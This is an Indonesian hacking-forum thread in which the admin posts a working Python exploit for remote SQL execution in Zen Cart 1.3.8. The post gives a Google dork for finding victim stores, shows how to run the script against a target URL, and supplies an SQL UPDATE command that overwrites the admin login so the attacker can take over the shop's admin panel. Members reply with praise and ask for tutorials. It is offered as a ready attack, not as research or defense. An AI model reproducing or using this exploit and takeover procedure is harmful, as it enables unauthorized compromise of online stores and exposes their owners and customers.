Welcome To t0k3k Miring Crew Official Forum
Welcome To t0k3k Miring Crew Official Forum

Silahkan Klik Login Untuk Masuk Di Forum
Atau Klik Register Untuk Menjadi Member Di t0k3k Miring Crew

Welcome To t0k3k Miring Crew Official Forum


 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Bugs Zen Cart

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Bugs Zen Cart   Thu Mar 11, 2010 7:42 pm

buka google ketik : powered by zen cart™ Nama Negara

kalo udah nih ada pithon :
Code:
#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)
   
url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya


kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew



sekian dan terima kasih



Credits And Thanks To : Ichito Bandito And Amature BoyZ
Special Thanks To : Indonesian Hacker Team

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
sadoelan
Entertainment Moderator
Entertainment Moderator


Jumlah posting : 101
Points : 133
Reputation : 2
Join date : 04.03.10
Age : 24
Lokasi : dunia lain

PostSubyek: Re: Bugs Zen Cart   Fri Mar 12, 2010 5:57 pm

wew....

nice post gan...

kren abizz...

_________________









http://uuddiieenn007.blogspot.com/


http://id-id.facebook.com/Tenshi.Iruga/
Kembali Ke Atas Go down
Lihat profil user http://uuddiieenn007@yahoo.com
Bboy_maverick
Crew Member
Crew Member


Jumlah posting : 99
Points : 124
Reputation : 0
Join date : 08.03.10
Age : 24
Lokasi : manado

PostSubyek: Re: Bugs Zen Cart   Fri Mar 12, 2010 7:05 pm

wew ..
asli coy ..
jgn lpa d'ajarin gan ....
Other Mood Other Mood
Kembali Ke Atas Go down
Lihat profil user http://www.microlighthangar.com/forum/messages.asp?iMsg=171&
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Bugs Zen Cart   Sat Mar 13, 2010 12:09 am

@^

yeeeee......

itu juga udah di post,, tinggal praktek......................

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
IqKataK
Penduduk Forum
Penduduk Forum


Jumlah posting : 40
Points : 48
Reputation : 0
Join date : 12.03.10
Lokasi : Bekasi-Jakarta-??????

PostSubyek: Re: Bugs Zen Cart   Sat Mar 13, 2010 2:33 pm

edelweize the warlock wrote:

kalo udah succes, tinggal di url target ditambahin /admin/
[contohny: http://t0k3kmiringcrew.forummotion.com/admin]
kalo succes setiap username sama pasword nya itu admin : wew
.

gg ikut"an gan....
Kembali Ke Atas Go down
Lihat profil user http://buzzy.forumotion.net
loex
Calon Penduduk Forum
Calon Penduduk Forum


Jumlah posting : 3
Points : 3
Reputation : 0
Join date : 31.07.11
Lokasi : soekabumie™

PostSubyek: Re: Bugs Zen Cart   Sun Jul 31, 2011 4:11 pm

plus video tutor nya donk om nubie biat ngerti
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: Bugs Zen Cart   Today at 3:56 pm

Kembali Ke Atas Go down
 
Bugs Zen Cart
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» (help)urgen,ukuran helm

Permissions in this forum:Anda tidak dapat menjawab topik
Welcome To t0k3k Miring Crew Official Forum :: Dangerous Zone :: Hacking :: Bugs-
Navigasi: